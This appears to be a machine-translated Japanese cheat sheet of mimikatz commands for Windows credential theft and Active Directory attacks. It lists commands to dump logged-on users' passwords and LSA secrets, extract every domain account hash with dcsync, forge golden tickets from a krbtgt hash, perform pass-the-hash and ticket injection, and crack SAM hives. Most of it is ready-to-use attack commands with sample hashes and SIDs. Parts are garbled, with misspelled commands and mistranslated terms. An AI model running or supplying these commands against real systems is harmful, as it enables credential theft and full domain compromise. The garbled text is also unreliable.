序文
管理者権限で使用しますが、管理者権限がない場合は基本的にすべての機能が正常に使用できませんのでご注意ください。
コマンド
通常の管理者が実行できるコマンド(パスワードクエリと権限の検出とログ)
lsadump :: lsa / injectは、すべてのユーザーのすべての詳細を表示できます
privilege :: debugは最初のコマンドを開き、実行する必要があります。
logこのコマンドの実行後のいわゆる出力は、現在のディレクトリのmimikatz.logファイルに保存されます。
sekurlsa :: logonpasswordsは、ログインしているユーザーのパスワードをリストします(より一般的に使用されます)
ドメイン制御権限でのみ実行できるコマンド
lsadump :: dcsync /domain:test.com / user:krbtgt指定したユーザーのパスワード情報を出力します
lsadump :: dcsync /domain:test.com / all / csvドメイン内のすべてのユーザーのアカウントパスワードを一覧表示する
金札関連
請求書情報のクリアとクエリ
ケルベロス::リストリストのすべてのチケット
のKerberos ::パージはすべてのチケットを削除
sekurlsa ::ケルベロスリストはKerberos資格情報を検証し、(ほとんどが使用されていないだけのドメインで使用することができない)
sekurlsa ::チケット/エクスポートリストすべてのチケットを(基本的には使用されず、ドメインでのみ使用できます)
メモをとる
nthashを使用してメモを作成する
kerberos :: golden / user:Administrator /domain:test.com / sid:S-1-5-21-4166986646-4168497534-2490551922 / krbtgt:308390d1ca7addf22c84ba9f1d26cbe4 /ticket:1.kirbi
krbtgtのハッシュ値を使用します。
kerberos :: gloden / user:Administrator /domain:xxx.xxx.xxx / sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi
krbtgtのaes256値を使用します。
kerberos :: gloden /domain:xxx.xxx / sid:xxxxxxxxxxx / aes256:xxxxxxxx / user:Administrator /ticket:test.kribi
pth攻撃:
sekurlsa :: pth /domian:test.com / user:zhangsan / ntlm:3dbde697d71690a769204beb12283678
lsadump :: dcsync /domain:test.com / all / csv
キャッシュにチケットをロード
kerberos :: ptt 1.kirbi
samファイルをクラックする
lsadump :: sam /sam:sam.hiv /system:system.hiv